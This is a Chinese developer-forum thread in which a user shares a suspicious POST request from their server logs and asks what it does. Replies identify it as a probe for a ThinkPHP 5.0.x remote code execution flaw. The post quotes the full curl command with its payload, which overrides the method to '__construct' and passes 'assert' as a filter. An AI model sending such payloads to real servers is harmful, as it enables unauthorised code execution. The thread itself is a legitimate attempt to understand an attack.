线上收到了这样的一条 POST 请求

2019-08-13 17:52:46 +08:00
 xzYao

线上收到了这样的一条 POST 请求:

curl
-X POST
-H "Cache-Control: no-cache"
-H "Connection: Keep-Alive"
-H "Content-Length: 196"
-H "Content-Type: application/x-www-form-urlencoded"
-H "Host: 115.159.128.48"
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
--data "{"filter":["assert"],"server":{"REQUEST_METHOD":"die(md5(DIRECTORY_SEPARATOR))"},"_method":"__construct"}"
"http://115.159.128.48/index.php"

这个看着不像是正常的请求,而且它触发了这样一个报错:

Symfony\Component\HttpFoundation\Exception\SuspiciousOperationException: Invalid method override "__CONSTRUCT".

无效的方法重写?有人知道这样的请求是什么意思,为什么会尝试覆盖构造方法吗?

2987 次点击
所在节点    问与答
5 条回复
bunnyblueair
2019-08-13 18:57:46 +08:00
ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 不能发连接
beastk
2019-08-13 22:06:30 +08:00
测试是否存在漏洞的吧
Tyler1989
2019-08-14 11:05:57 +08:00
@beastk dalao,你的网站挂了
beastk
2019-08-14 11:29:47 +08:00
@Tyler1989 #3 哪个
Tyler1989
2019-08-14 11:31:51 +08:00

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/591582

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX